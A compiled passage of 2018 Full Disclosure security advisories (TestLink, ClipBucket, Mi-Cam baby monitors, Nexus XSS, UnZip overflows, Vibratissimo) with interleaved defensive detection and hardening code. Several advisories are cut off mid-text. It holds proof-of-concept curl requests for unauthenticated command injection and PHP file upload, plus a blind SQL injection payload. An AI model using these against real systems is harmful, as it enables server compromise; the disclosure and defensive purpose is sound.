http:///lib/attachments/attachmentdownload.php?skipCheck=1&id=

The tag  specifies the target address and can also include a subfolder
where the hosted TestLink application is located.
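The ID iteration described above leaves a clear footprint in the web server's access log. The following detection is an added example, not part of the advisory or of TestLink: it flags a client that successfully walks sequential attachment ids through attachmentdownload.php with skipCheck=1. The log lines are constructed sample data.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Minimal parser for Apache/nginx "combined" log lines: client, request, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+'
)
ATTACHMENT_PATH = "/lib/attachments/attachmentdownload.php"


def parse_line(line):
    """Return (ip, path, status) for a request line, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m.group("ip"), m.group("path"), int(m.group("status"))


def attachment_id(path):
    """Return the integer id of an attachmentdownload.php request that carries
    skipCheck=1, or None when the request does not match the vulnerable pattern.
    The script may sit below any sub-folder, as the advisory notes."""
    parts = urlsplit(path)
    if not parts.path.endswith(ATTACHMENT_PATH):
        return None
    qs = parse_qs(parts.query)
    if qs.get("skipCheck", [""])[0] != "1":
        return None
    try:
        return int(qs.get("id", [""])[0])
    except ValueError:
        return None


def find_enumeration(lines, min_ids=5, max_gap=3):
    """Flag clients that successfully fetched at least `min_ids` distinct
    attachments via skipCheck=1 where the sorted ids never jump by more than
    `max_gap`: the footprint of a simple ID iterator. Non-200 responses are
    ignored because they leak nothing. Returns {ip: (first_id, last_id, n)}."""
    ids_by_ip = defaultdict(set)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, path, status = parsed
        if status != 200:
            continue
        aid = attachment_id(path)
        if aid is not None:
            ids_by_ip[ip].add(aid)

    flagged = {}
    for ip, ids in ids_by_ip.items():
        seq = sorted(ids)
        if len(seq) >= min_ids and all(b - a <= max_gap for a, b in zip(seq, seq[1:])):
            flagged[ip] = (seq[0], seq[-1], len(seq))
    return flagged


# Constructed sample log (not from any real system).
_P = "/testlink/lib/attachments/attachmentdownload.php"
SAMPLE_LOG = [
    # One client walks ids 1..7 with skipCheck=1; id 4 does not exist (404).
    f'203.0.113.5 - - [10/Oct/2017:13:55:36 +0000] "GET {_P}?skipCheck=1&id=1 HTTP/1.1" 200 4521',
    f'203.0.113.5 - - [10/Oct/2017:13:55:37 +0000] "GET {_P}?skipCheck=1&id=2 HTTP/1.1" 200 812',
    f'203.0.113.5 - - [10/Oct/2017:13:55:37 +0000] "GET {_P}?skipCheck=1&id=3 HTTP/1.1" 200 9934',
    f'203.0.113.5 - - [10/Oct/2017:13:55:38 +0000] "GET {_P}?skipCheck=1&id=4 HTTP/1.1" 404 211',
    f'203.0.113.5 - - [10/Oct/2017:13:55:38 +0000] "GET {_P}?skipCheck=1&id=5 HTTP/1.1" 200 1200',
    f'203.0.113.5 - - [10/Oct/2017:13:55:39 +0000] "GET {_P}?skipCheck=1&id=6 HTTP/1.1" 200 77',
    f'203.0.113.5 - - [10/Oct/2017:13:55:39 +0000] "GET {_P}?skipCheck=1&id=7 HTTP/1.1" 200 77',
    # A logged-in user fetching one attachment the normal way.
    f'198.51.100.7 - - [10/Oct/2017:14:02:11 +0000] "GET {_P}?id=42 HTTP/1.1" 200 3001',
    '198.51.100.7 - - [10/Oct/2017:14:02:12 +0000] "GET /testlink/login.php HTTP/1.1" 200 2210',
]

if __name__ == "__main__":
    for ip, (first, last, n) in find_enumeration(SAMPLE_LOG).items():
        print(f"{ip}: {n} attachments fetched with skipCheck=1, ids {first}..{last}")
```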


Vulnerable / tested versions:
-
The following versions have been tested and are vulnerable. It is assumed that
older versions are affected as well, e.g.:
* 1.9.16
* 1.9.15
* 1.9.14


Vendor contact timeline:

2017-10-18: Contacting vendor through http://mantis.testlink.org
Vendor requested the information.
2017-10-19: Asked if the advisory should be uploaded to mantis directly.
2017-10-21: Contact agreed.
2017-10-23: Uploaded the advisory to mantis.
2017-11-01: Contact provided a fix for 1.9.16. Fixes will be created for
1.9.15 and 1.9.14 too. Vendor asked us for verification.
2017-11-07: Stated that verification is not possible at the moment (no test
instance) and that it can be verified easily with the PoC
2018-01-09: Asked for status update; No answer.
2018-01-29: Asked for status update; No answer.
2018-02-16: Asked for status update.
2018-02-17: Vendor responded that we can re-check the fix or release the
advisory.
2018-02-19: Asked the vendor for reachable test-instance, reply: there is
no test instance
2018-02-28: Public release of security advisory


Solution:
-
Check-out the current testlink-code on branch "testlink_1_9":
https://github.com/TestLinkOpenSourceTRMS/testlink-code/tree/testlink_1_9/

The following commit contains the fix since 2017-11-01:
https://github.com/TestLinkOpenSourceTRMS/testlink-code/commit/d5ffdb7634e43ba352e9567333682b6436cfb43d

Upgrade to 1.9.17 (after November 2017).


Workaround:
---
Restrict network access and do not expose the TestLink interface to the
internet.


Advisory URL:
-----
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal
Moscow - Munich - Kuala Lumpur - Singapore
Vienna (HQ) - Vilnius - Zurich


[FD] SEC Consult SA-20180227-0 :: OS command injection, arbitrary file upload & SQL injection in ClipBucket

2018-02-27 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20180227-0 >
===
  title: OS command injection, arbitrary file upload & SQL injection
product: ClipBucket
 vulnerable version: <4.0.0 - Release 4902
  fixed version: 4.0.0 - Release 4902
 CVE number: -
 impact: critical
   homepage: http://clipbucket.com/
  found: 2017-09-06
 by: Ahmad Ramadhan Amizudin (Office Kuala Lumpur)
 Wan Ikram (Office Kuala Lumpur)
 Fikri Fadzil (Office Kuala Lumpur)
 Jasveer Singh (Office Kuala Lumpur)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal
 Moscow - Munich - Kuala Lumpur - Singapore
 Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"ClipBucket is a free and open source software which helps us to create a
complete video sharing website like YouTube, Dailymotion, Metacafe, Veoh, Hulu
in few minutes of setup. It was first created in 2007 by Arslan Hassan and his
team of developers. ClipBucket was developed as a YouTube clone but has been
upgraded with advanced features and enhancements. It uses FFMPEG for video
conversion and thumbs generation which is the most widely used application so,
users can stream it straight away using the Video JS and HTML 5 Players."

Source: https://clipbucket.com/about


Business recommendation:

By exploiting the vulnerabilities documented in this advisory, an attacker can
fully compromise the web server which has ClipBucket installed. Potentially
sensitive data might get exposed through this attack.

Users are advised to immediately install the patched version provided by the
vendor.


Vulnerability overview/description:
---
1. Unauthenticated OS Command Injection
Any OS commands can be injected by an unauthenticated attacker. This is a
serious vulnerability as the chances for the system to be fully compromised
are very high. This same vulnerability can also be exploited by authenticated
attackers with normal user privileges.

2. Unauthenticated Arbitrary File Upload
A malicious file can be uploaded into the webserver by an unauthenticated
attacker. It is possible for an attacker to upload a script to issue operating
system commands. This same vulnerability can also be exploited by an
authenticated attacker with normal user privileges.

3. Unauthenticated Blind SQL Injection
The identified SQL injection vulnerabilities enable an attacker to execute
arbitrary SQL commands on the underlying MySQL server.


Proof of concept:
-
1. Unauthenticated OS Command Injection
Without having to authenticate, an attacker can exploit this vulnerability
by manipulating the "file_name" parameter during the file upload in the script
/api/file_uploader.php:

$ curl -F "Filedata=@pfile.jpg" -F "file_name=aa.php ||<>" \
    http://$HOST/api/file_uploader.php


Alternatively, this vulnerability can also be exploited by authenticated basic
privileged users with the following payload by exploiting the same issue in
/actions/file_downloader.php:

$ curl --cookie "[--SNIP--]" \
    --data "file=http://localhost/vid.mp4&file_name=abc || <>" \
    "http://$HOST/actions/file_downloader.php"


2. Unauthenticated Arbitrary File Upload
Below is the cURL request to upload arbitrary files to the webserver with no
authentication required.

$ curl -F "file=@pfile.php" -F "plupload=1" -F "name=anyname.php" \
    "http://$HOST/actions/beats_uploader.php"

$ curl -F "file=@pfile.php" -F "plupload=1" -F "name=anyname.php" \
    "http://$HOST/actions/photo_uploader.php"

Furthermore, this vulnerability is also available to authenticated users with
basic privileges:

$ curl --cookie "[--SNIP--]" \
    -F "coverPhoto=@valid-image-with-appended-phpcode.php" \
    "http://$HOST/edit_account.php?mode=avatar_bg"
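Both issues 1 and 2 come from trusting the client-supplied file name: once in a shell command, once as the name stored under the web root. The helper below is an added example in Python, not ClipBucket's PHP: it uses the client name only to pick an allowlisted extension, stores the file under a random name, and builds the converter command as an argument vector so no shell ever parses it. The ffmpeg flags are an assumption for illustration.

```python
import os
import re
import secrets

# Extensions an upload may carry, mapped to the media kind the app expects.
# Script extensions such as .php are absent, so they can never be stored.
ALLOWED_EXT = {"jpg": "image", "png": "image", "gif": "image",
               "mp4": "video", "mp3": "audio"}
_EXT_RE = re.compile(r"^[a-z0-9]{1,5}$")


class RejectedUpload(ValueError):
    """Raised when a client-supplied file name must not be accepted."""


def stored_name(client_name):
    """Derive (server_side_name, kind) from the client-supplied name.

    Only the final extension is taken from the client, and only if it is on
    the allowlist; the stored name itself is random. Names like
    "aa.php || cmd" (shell metacharacters), "../../x.mp4" (traversal) or
    "shell.php.jpg" (double extension) therefore neither reach a shell nor
    land as an executable script under the web root.
    """
    base = os.path.basename(client_name.replace("\\", "/"))
    if "." not in base:
        raise RejectedUpload("missing extension")
    ext = base.rsplit(".", 1)[1].lower()
    if not _EXT_RE.match(ext) or ext not in ALLOWED_EXT:
        raise RejectedUpload(f"extension not allowed: {ext!r}")
    return f"{secrets.token_hex(16)}.{ext}", ALLOWED_EXT[ext]


def thumbnail_argv(video_path, thumb_path):
    """Build the converter command as an argument vector (hypothetical ffmpeg
    flags). Handing this list to subprocess.run() without shell=True means
    characters like '|', ';' or '&' in a path are ordinary bytes, never
    operators, which is what removes the injection the advisory describes.
    """
    return ["ffmpeg", "-i", video_path, "-vframes", "1", thumb_path]
```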


3. Unauthenticated Blind SQL Injection
The following parameters have been identified to be vulnerable against
unauthenticated blind SQL injection.

URL : http://$HOST/actions/vote_channel.php
METHOD  : POST
PAYLOAD : channelId=channelId=1-BENCHMARK(1, rand())

The source code excerpt below shows the vulnerable code
VULN. FILE : /actions/vote_channel.php
VULN. CODE :
[...]
$vote = $_POST["vote"];
$userid = $_POST["channelId"];
//if($userquery->login_check('',true)){
if($vote == "yes"){
$query = "UPDATE &quo

[FD] SEC Consult SA-20180221-0 :: Hijacking of arbitrary miSafes Mi-Cam video baby monitors

2018-02-21 Thread SEC Consult Vulnerability Lab
We have published an accompanying blog post to this technical advisory with
further information:

https://www.sec-consult.com/en/blog/2018/02/internet-of-babies-when-baby-monitors-fail-to-be-smart/index.html


SEC Consult Vulnerability Lab Security Advisory < 20180221-0 >
===
  title: Hijacking of arbitrary video baby monitors
product: miSafes Mi-Cam remote video monitor
 vulnerable version: Android application v1.2.0, iOS v1.0.5
 Firmware v1.0.38
  fixed version: -
 CVE number: -
 impact: critical
   homepage: http://www.misafes.com/mi-cam
  found: 2017-11-30
 by: Mathias Frank (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal
 Moscow - Munich - Kuala Lumpur - Singapore
 Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"Mi-CamHD, Wi-Fi remote video monitor for everyone; 720P HD quality video, easy
set up & use, two-way talk and supports free local video recording, all can be
use by our user friendly Mi-Cam app."

Source: http://www.misafes.com/mi-cam


Business recommendation:

SEC Consult recommends not to use this device until a thorough security review
has been performed by security professionals and all identified issues have
been resolved! Although cloud-connected hardware may have an advantage regarding
usability and convenience for users, if security is lacking those products pose
a great risk for all customers.

Furthermore, it seems there exist similar products from other vendors, e.g.
"Qihoo 360 Smart Home Camera", that look exactly the same and may also be
affected, but SEC Consult could not verify this. The cloud component hosted by
"qiwocloud2.com" may be used by other products as well. Additional information
regarding other vendors is given in our blog post linked at the top of this
advisory.


Vulnerability overview/description:
---
The usage of the Mi-Cam video baby monitor and its Android (or iOS) application
involves numerous requests to a cloud infrastructure available at
ipcam.qiwocloud2.com with the aim of communicating with the video baby monitor
or respective Android application.

The Android application has at least 5-10 installations according to
Google Play Store with potentially as many iOS users as well.

SEC Consult has identified multiple critical security issues within this
product.


1) Broken Session Management & Insecure Direct Object References
The usage of the Android application "Mi-Cam" and the interaction with the
video baby monitor involves several different API calls. A number of critical
API calls can be accessed by an attacker with arbitrary session tokens because
of broken session management.

This allows an attacker to retrieve information about the supplied account
and its connected video baby monitors. Information retrieved by this feature
is sufficient to view and interact with all connected video baby monitors for
the supplied UID.


2) Missing Password Change Verification Code Invalidation
The forgotten-password functionality sends a 6-digit validation key, valid
for 30 minutes, to the supplied email address in order to set a new password.
Multiple codes can be requested, though, while previously delivered codes do
not get invalidated, and any one of them can be used as a valid key. This can
easily be brute-forced to take over other accounts.


3) Available Serial Interface
The PCB of the video baby monitor holds an unlabeled UART interface where an
attacker is able to get hardware level access to the device and for instance
extract the firmware for further analysis. SEC Consult identified further
security issues such as outdated software (issue 6) or weak passwords
(issue 4) by analyzing the firmware using IoT Inspector
(https://www.iot-inspector.com).


4) Weak Default Credentials
The "root" user available on the video baby monitor uses very weak default
credentials with only 4 digits.


5) Enumeration of user accounts
The password reset functionality leaks information about the existence of
supplied user accounts which can aid in further (brute-force) attacks.
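Issues 2 and 5 live in the same reset flow and can be closed in one component. The code below is an added example, not the Mi-Cam backend's code: it keeps the advisory's 6-digit code and 30-minute validity, lets only the newest code for an account stay valid, caps wrong guesses so the 10^6 space cannot be searched, and replies identically for unknown addresses. The account set and the outbox are constructed stand-ins for the real user store and mail transport; time is passed in as seconds.

```python
import hmac
import secrets
from dataclasses import dataclass, field

CODE_TTL = 30 * 60        # validity window in seconds, as stated in the advisory
MAX_ATTEMPTS = 5          # wrong guesses before a code is discarded
GENERIC_REPLY = "If that address is registered, a reset code has been sent."


@dataclass
class ResetCode:
    code: str
    expires_at: float     # absolute time in seconds
    attempts: int = 0


@dataclass
class ResetService:
    """Minimal reset-code store. `accounts` holds registered e-mail addresses
    (constructed sample data); `outbox` stands in for the mail transport so
    the issued code can be inspected; `_active` maps each e-mail address to
    its single live code."""
    accounts: set
    outbox: list = field(default_factory=list)
    _active: dict = field(default_factory=dict)

    def request_reset(self, email, now):
        """Issue a fresh 6-digit code. Storing it under the e-mail key
        replaces any earlier code, so only the newest one is ever valid
        (issue 2). Unknown addresses get the identical reply and no mail,
        which removes the account-enumeration oracle (issue 5)."""
        if email in self.accounts:
            code = f"{secrets.randbelow(10**6):06d}"
            self._active[email] = ResetCode(code, now + CODE_TTL)
            self.outbox.append((email, code))
        return GENERIC_REPLY

    def verify(self, email, code, now):
        """Return True once for the live, unexpired code. A code is consumed
        on success and dropped after MAX_ATTEMPTS failures, so a 6-digit
        space cannot be walked within the 30-minute window."""
        entry = self._active.get(email)
        if entry is None:
            return False
        if now >= entry.expires_at:
            del self._active[email]
            return False
        entry.attempts += 1
        if (len(code) == 6 and code.isascii() and code.isdigit()
                and hmac.compare_digest(entry.code, code)):
            del self._active[email]          # single use
            return True
        if entry.attempts >= MAX_ATTEMPTS:
            del self._active[email]
        return False
```

At runtime `now` would be `time.time()`; fixed integers are used in the checks so the expiry and attempt-cap behaviour is deterministic.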


6) Outdated and Vulnerable Software
Several software components which are affected by publicly known
vulnerabilities were identified in the firmware of the video baby monitor.


Proof of concept:
-
As the vendor could not be reached in order to get the issues fixed we will omit
detailed proof of concept information in this advisory.


1) Broke

[FD] SEC Consult SA-20180208-0 :: Multiple Cross-Site Scripting Vulnerabilities in Sonatype Nexus Repository Manager OSS/Pro

2018-02-08 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20180208-0 >
===
  title: Multiple Cross-Site Scripting Vulnerabilities
product: Sonatype Nexus Repository Manager OSS/Pro
 vulnerable version: <=2.14.5, <=3.7.1
  fixed version: 2.14.6, 3.8.0
 CVE number: CVE-2018-5306, CVE-2018-5307
 impact: Medium
   homepage: https://www.sonatype.com/
  found: 2017-12-12
 by: Werner Schober, Daniel Ostovary (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"At Sonatype we have a long history of partnership with the world of open
source software development. From our humble beginning as core contributors
to Apache Maven, to supporting the world’s largest repository of open source
components (Central), to distributing the world's most popular repository
manager (Nexus), we exist for one simple reason; to help accelerate software
innovation."

Source: https://www.sonatype.com/about-sonatype


Business recommendation:

The Sonatype Nexus Repository Server is affected by multiple XSS vulnerabilities
which could be used by an attacker to execute JavaScript code in the user's
browser.

The vendor provides a patch for both version 2 and 3 of the product which should
be installed immediately.

It is recommended to conduct a thorough security review by IT security
professionals in order to identify potential other security issues.


Vulnerability overview/description:
---
1) Reflected XSS vulnerability
The parameters "repoId" and "format" of the "healthCheckFileDetail" function
are vulnerable to reflected XSS. If the attacker can lure a user into
clicking a crafted link he could execute arbitrary JavaScript code.
In case the user has sufficient permissions, an attacker can create arbitrary
(administrative) users or perform stored XSS attacks (see 2).


2) Stored XSS vulnerabilities
The application is vulnerable to multiple stored XSS vulnerabilities,
which are described in the following list.

2.1) The first one is located in the "File Upload" functionality of
the "Staging Upload". Uploading a file with JavaScript code
in its name stores that JavaScript code, which gets
triggered every time the file name is shown (e.g. in "Repositories").

2.2) The second stored XSS vulnerability is more precisely
a stored DOM injection. This vulnerability
affects the functionality of creating a new user. When doing
so it is possible to inject JavaScript/HTML code into the username,
which later gets rendered/executed every time the username is
displayed.

2.3) The third stored XSS vulnerability is also a stored DOM injection.
It affects the "IQ Server Connection"/"IQ Server Dashboard"
functionality. The "IQ Server URL" field in the "IQ Server
Connection" allows injecting JavaScript/HTML code into the
menu bullet point "IQ Server Dashboard".


The vendor provided the following CVE numbers:
* CVE-2018-5306 - covers the XSS vulnerabilities in Nexus 3
* CVE-2018-5307 - covers the XSS vulnerabilities in Nexus 2


Proof of concept:
-
1) Reflected XSS vulnerability
By luring a user into clicking the following link, an arbitrary
JavaScript payload will be executed:

https://example.com/nexus/service/siesta/healthcheck/healthCheckFileDetail/.../index.html?repoId=public&format=sectest

Vulnerable parameters:
-) repoId
-) format

2) Stored XSS vulnerabilities
***Please note that only users with access to the respective functionalities
are susceptible to the following stored XSS vulnerabilities.***

2.1)
The staging upload allows an attacker to upload a file, which contains a
JavaScript payload in the filename. An example for a filename containing a
"malicious" payload is as follows: ".jpg"

This file can be uploaded without problems, and every time the filename is
displayed, the JavaScript payload gets executed.

2.2)
An attacker is able to create a new user, which contains a malicious JavaScript
payload in the username. As an example the following username can be used:

"EvilAdmin Create Repository -> Access repository via "Repositories" ->
JavaScript code is being executed)

2.3)
The Nexus server allows setting up an IQ server connection. The server name is
not validated and therefore allows the permanent injection of JavaScript code. To
demons

[FD] SEC Consult SA-20180207-0 :: Multiple buffer overflow vulnerabilities in InfoZip UnZip

2018-02-07 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20180207-0 >
===
  title: Multiple buffer overflow vulnerabilities
product: InfoZip UnZip
 vulnerable version: UnZip <= 6.00 / UnZip <= 6.1c22
  fixed version: 6.10c23
 CVE number: CVE-2018-131,CVE-2018-132,CVE-2018-133
 CVE-2018-134,CVE-2018-135
 impact: high
   homepage: http://www.info-zip.org/UnZip.html
  found: 2017-11-03
 by: R. Freingruber (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"UnZip is an extraction utility for archives compressed in .zip format (also
called "zipfiles"). Although highly compatible both with PKWARE's PKZIP and
PKUNZIP utilities for MS-DOS and with Info-ZIP's own Zip program, our
primary objectives have been portability and non-MSDOS functionality.
UnZip will list, test, or extract files from a .zip archive, commonly found
on MS-DOS systems. The default behavior (with no options) is to extract into
the current directory (and subdirectories below it) all files from the
specified zipfile."

Source: http://www.info-zip.org/UnZip.html

InfoZip's UnZip is used as the default utility for uncompressing ZIP archives
on nearly all *nix systems. It is shipped with many commercial products on
Windows to provide (un)compression functionality as well.


Business recommendation:

InfoZip Unzip should be updated to the latest available version.


Vulnerability overview/description:
---
1) Heap-based buffer overflow in password protected ZIP archives (CVE-2018-135)

InfoZip's UnZip suffers from a heap-based buffer overflow when uncompressing
password protected ZIP archives. An attacker can exploit this vulnerability
to overwrite heap chunks to get arbitrary code execution on the target system.

For newer builds the risk for this vulnerability is partially mitigated
because modern compilers automatically replace unsafe functions with length
checking variants of the same function (for example sprintf gets replaced
by sprintf_chk). This is done by the compiler at locations where the length
of the destination buffer can be calculated.

Nevertheless, it must be mentioned that UnZip is used on many systems
including older systems or on exotic architectures on which this protection
is not in place. Moreover, pre-compiled binaries which can be found on the
internet lack the protection because the last major release of InfoZip's
UnZip was in 2009 and compilers didn't enable this protection per default at
that time. The required compiler flags are also not set in the Makefile of
UnZip. Compiled applications are therefore only protected if the used compiler
has this protection enabled per default which is only the case with modern
compilers.

To trigger this vulnerability (and the following) it's enough to uncompress
a manipulated ZIP archive. Any of the following invocations can be used to
trigger and abuse the vulnerabilities:

>unzip malicious.zip
>unzip -p malicious.zip
>unzip -t malicious.zip

2) Heap-based out-of-bounds write (CVE-2018-131)

This vulnerability only affects UnZip 6.1c22 (next beta version of UnZip).
InfoZip's UnZip suffers from a heap-based out-of-bounds write if the
archive filename does not contain a .zip suffix.

3) Heap/BSS-based buffer overflow (Bypass of CVE-2015-1315) (CVE-2018-132)

This vulnerability only affects UnZip 6.1c22 (next beta version of UnZip).
InfoZip's UnZip suffers from a heap/BSS-based buffer-overflow which
can be used to write null-bytes out-of-bound when converting
attacker-controlled strings to the local charset.

4) Heap out-of-bounds access in ef_scan_for_stream (CVE-2018-133)

This vulnerability only affects UnZip 6.1c22 (next beta version of UnZip).
InfoZip's UnZip suffers from a heap out-of-bounds access
vulnerability.

5) Multiple vulnerabilities in the LZMA compression algorithm (CVE-2018-134)

This vulnerability only affects UnZip 6.1c22 (next beta version of UnZip).
InfoZip's UnZip suffers from multiple vulnerabilities in the LZMA
implementation. Various crash dumps have been supplied to the vendor
but no further analysis has been performed.


Proof of concept:
-
1) Heap-based buffer overflow in password protected ZIP archives (CVE-2018-135)

Unzipping a malicious archive results in the following output:
(On Ubuntu 16.04 with Un

Re: [FD] Banknotes Misproduction security & biometric weakness

2018-02-07 Thread Vulnerability Lab
Am 30.01.2018 um 15:43 schrieb Jeffrey Walton:
> On Tue, Jan 30, 2018 at 9:22 AM, Vulnerability Lab
>  wrote:
>> Am 30.01.2018 um 15:18 schrieb Jeffrey Walton:
>>> On Tue, Jan 30, 2018 at 4:08 AM, Vulnerability Lab
>>>  wrote:
>>>> Document Title:
>>>> ===
>>>> Banknotes Misproduction security & biometric weakness
>>>> ...
>>>>
>>>> Technical Details & Description:
>>>> 
>>>> In the last months we reviewed the new 20€ & 50€ banknotes of the
>>>> European Central Bank. One of our core team researchers identified
>>>> that for the security sign of the holograms different components are in
>>>> use. The security signs are built by the European Central Bank with
>>>> several high-profile elements in the signs to ensure that the banknotes
>>>> have a serious level of protection against fraud or fake money. After
>>>> processing some time to identify an impact, we were finally able to
>>>> identify the following security problematic ...
>>>>
>>> The details seem to be missing from the announcement and the website.
>>
>> read the linked full document as pdf
> Thanks. There is no linked PDF.

The download is available in the references section.

- atu

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com



Re: [FD] Banknotes Misproduction security & biometric weakness

2018-02-07 Thread Vulnerability Lab
Am 05.02.2018 um 16:10 schrieb Vulnerability Lab:
> Hello Intern0t (inter...@protonmail.com),
> could you please tell me what your strange blabla has to do with the
> fact that the hologram can be read and accepted as a fingerprint because
> of the polipaper inside. Did you see that we changed the finger after
> the save due to the register. If you believe that this is normal
> behaviour or a troll issue, please ask Lenovo. They included their
> universal fingerprint from a mark inside a laptop. We figured out by now
> that the hologram can be read to finally bypass with a universal key.
> This strange anomaly should for sure not be possible in scans that must
> identify a hologram. If your technical expertise is not high level
> enough to talk seriously about the issue's impact, I can't help you.
>
> Best Regards,
> Vulnerability Laboratory,

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com




Re: [FD] Banknotes Misproduction security & biometric weakness

2018-02-07 Thread Vulnerability Lab
Am 31.01.2018 um 17:21 schrieb Vulnerability Lab:
> Hello Ben Tasker,
> sorry if the title of the issue led you to misunderstand the
> article. The currency is still secure.
> The title refers to the information used for the issue. In case it was
> misleading we will update it, but you were the first who misunderstood
> the article by comments.
>
> "The weakness, the theory goes, is that someone could register a
> "fingerprint" in your system by using a banknote. This'd give them
> access whilst also meaning you didn't at least have a hash of their
> real fingerprint for forensics to find."
> This is correct. Also the problem that others can access with the same
> hologram, for example, the highly protected area (mil & gov).
>
>
> "Another theory is that users might opt to use a banknote instead of
> their own fingerprint. I'm not quite sure what the likelihood of that
> is, in that it's not exactly convenient, and if you're concerned about
> privacy implications from a fingerprint scanner the best option is not
> to use it."
>
> What about, if the fingerprint of Lenovo (bug disclosed in parallel to
> us) is our European currency. Meaning the hardcoded fingerprints that
> were published in parallel are exactly what we refer to when we talk
> about a universal fingerprint. In real life it is pretty easy to use it
> in large companies due to the registration and as well on entrance. Maybe
> you feel like the practical interaction cannot happen; we can confirm
> to you from Germany that we were successful. The government did not allow
> us to register the fingerprint to the real system, otherwise a compromise
> could not be excluded.

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com




[FD] SEC Consult SA-20180201-0 :: Multiple critical vulnerabilities in Whole Vibratissimo Smart Sex Toy product range

2018-02-01 Thread SEC Consult Vulnerability Lab
We have published an accompanying blog post to this technical advisory with
further information:

https://www.sec-consult.com/en/blog/2018/02/internet-of-dildos-a-long-way-to-a-vibrant-future-from-iot-to-iod/index.html


SEC Consult Vulnerability Lab Security Advisory < 20180201-0 >
===
  title: Multiple critical vulnerabilities
product: Whole Vibratissimo Smart Sex Toy product range
 vulnerable version: <6.3 (iOS), <6.2.2 (Android), <2.0.2 (Firmware)
  fixed version: 6.3 (iOS), 6.2.2 (Android), 2.0.2 (Firmware)
 CVE number: -
 impact: critical
   homepage: http://www.vibratissimo.com
  found: 2017-10-01
 by: W. Schober (Office Vienna)
     SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"Control with Vibratissimo your AMOR Toy on your smartphone and get even more
features by the app. With Vibratissimo you are open to new and exciting
opportunities, whether you are in the same room or on different continents."

Source: http://www.vibratissimo.com/en/index.html


Business recommendation:
------------------------
SEC Consult highly recommends updating the app to the newest version available
in the app store. Furthermore, the password used within the app should be
changed immediately. If the password was used for multiple services, all of
those passwords should be changed. To get rid of issue number 3 (Unauthenticated
Bluetooth LE Connections) a firmware update can be applied. To apply the
firmware update the devices have to be sent to Amor Gummiwaren GmbH.


Vulnerability overview/description:
---
1) Customer Database Credential Disclosure
The credentials for the whole Vibratissimo database environment were exposed on
the internet. Because the phpMyAdmin interface was exposed as well, an attacker
could have connected to the database and dumped the whole data set. The data
set contains, for example, the following data:

- Usernames
- Session Tokens
- Cleartext passwords
- chat histories
- explicit image galleries, which are created by the users themselves


2) Exposed administrative interfaces on the internet
An administrative interface for databases was available without any filtering to
the whole internet. In combination with other vulnerabilities an attacker
could have been able to get access to the whole database data and even take over
the server.


3) Cleartext Storage of Passwords
The user passwords were stored unhashed, in cleartext, in the database.
If an attacker gained access to the database (e.g. via the credential
disclosure), they could have retrieved the plaintext passwords of users and
abused their privileges in the system.


4) Unauthenticated Bluetooth LE Connections
The sex toys connect to the app without prior authentication, which is the
standard use case. For example, one of the identified Bluetooth services allows
reading the current device temperature. Other services which can be accessed
without prior authentication are:

-) Setting the "intensity" of the current vibration pattern
-) Reading various values (temperature, etc.)


5) Insufficient Authentication Mechanism
The Android application uses a type of authentication which is against known
best practice: the username and password are sent with every request to the
server to authenticate and authorise the request, and no session management is
implemented. The authentication credentials are, however, transmitted via an
encrypted SSL/TLS connection.


6) Insecure Direct Object Reference
Due to flaws in the authorization schema, an authorization bypass vulnerability
allows an attacker to get access to restricted functions and resources. In this
case a user is able to set a profile picture by uploading a provided image. The
image is stored on the Vibratissimo server and renamed. All images are renamed
by incrementing a global number and assigning this number as the name of the
image (e.g. 200.png). An attacker is thus able to iterate through those images
and dump personal user images, some of which contain explicit content. The
image can even be accessed if the profile has been set to "hidden" by the user.
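
The two halves of issue 6 are the predictable name and the missing authorization
decision on the download path. The following added example (not Vibratissimo's
or SEC Consult's code) models both: a store that names images by a global
counter and checks nothing, beside one that hands out random references and
enforces ownership and the profile's "hidden" flag on every read. Users, image
bytes and the starting counter value are constructed samples.

```python
"""Enumerable profile-image names versus owner-checked, unguessable references."""
import secrets
from typing import Dict, Optional, Tuple


class VulnerableImageStore:
    """Sequential file names and no access control: the pattern described in item 6."""

    def __init__(self, start: int = 200) -> None:
        self._counter = start                # constructed: matches the "200.png" example
        self._files: Dict[str, bytes] = {}

    def upload(self, owner: str, data: bytes) -> str:
        name = f"{self._counter}.png"        # predictable: the next image is counter + 1
        self._counter += 1
        self._files[name] = data             # the owner is not even recorded
        return name

    def fetch(self, requester: str, name: str) -> Optional[bytes]:
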